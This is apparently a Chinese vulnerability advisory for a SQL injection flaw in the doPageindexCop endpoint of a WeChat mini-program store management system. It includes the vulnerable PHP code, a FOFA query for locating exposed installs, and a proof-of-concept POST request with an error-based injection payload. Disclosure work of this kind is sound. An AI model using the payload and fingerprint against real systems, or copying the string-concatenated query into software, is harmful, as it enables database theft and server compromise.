万能门店小程序管理系统 /api/wxapps/doPageindexCop SQL 注入漏洞


漏洞简介

万能门店小程序管理系统是一款功能强大的工具,旨在为各行业商家提供线上线下融合的全方位解决方案。是一个集成了会员管理和会员营销两大核心功能的综合性平台。它支持多行业使用,通过后台一键切换版本,满足不同行业商家的个性化需求。该系统采用轻量后台,搭载高效服务器,确保小程序运行流畅,提升用户体验。万能门店小程序管理系统 /api/wxapps/doPageindexCop 存在 SQL 注入漏洞,攻击者可通过该漏洞获取数据库中的敏感信息,甚至可能进一步控制服务器。

影响版本

万能门店小程序全开源独立版V5.2.0

fofa语法

body="/new_plat/index.html#/login" || (body="/comhome/cases/index.html" && body="/Comhome/functionshow/index.html")

漏洞分析

application/api/controller/Wxapps.php

public function doPageindexCop()
    {
        $type = input("type");
        $uniacid = input("uniacid");
        $now = time();
        $prefix = config('database.prefix');
        $indexCopAll = Db::query("SELECT * FROM {$prefix}wd_xcx_coupon WHERE uniacid = {$uniacid} and flag = 1 and (etime > {$now} or etime = 0) order by num desc,id desc");
        if ($indexCopAll) {
            $indexCopOne = $indexCopAll[0];
            if ($indexCopOne) {
                if ($indexCopOne['btime']) {
                    $indexCopOne['btime'] = date("Y-m-d", $indexCopOne['btime']);
                }
                if ($indexCopOne['etime']) {
                    $indexCopOne['etime'] = date("Y-m-d", $indexCopOne['etime']);
                }
            }
            return json_encode(array('data' => $indexCopOne));
        } else {
            return json_encode(array('data' => 1));
        }
    }

$uniacid 直接拼接进 Db::query sql语句里,造成SQL注入漏洞。

漏洞复现

POST /api/wxapps/doPageindexCop HTTP/1.1
Host: wxapps.mrxn.net
Content-Type: application/x-www-form-urlencoded

uniacid=1+AND+GTID_SUBSET(CONCAT((SELECT(md5(123456)))),3119)--


手机扫码阅读

万能门店小程序管理系统 /api/wxapps/_Postrequest 文件读取漏洞

万能门店小程序管理系统 /api/wxapps/doPagemycoupon SQL 注入漏洞

评 论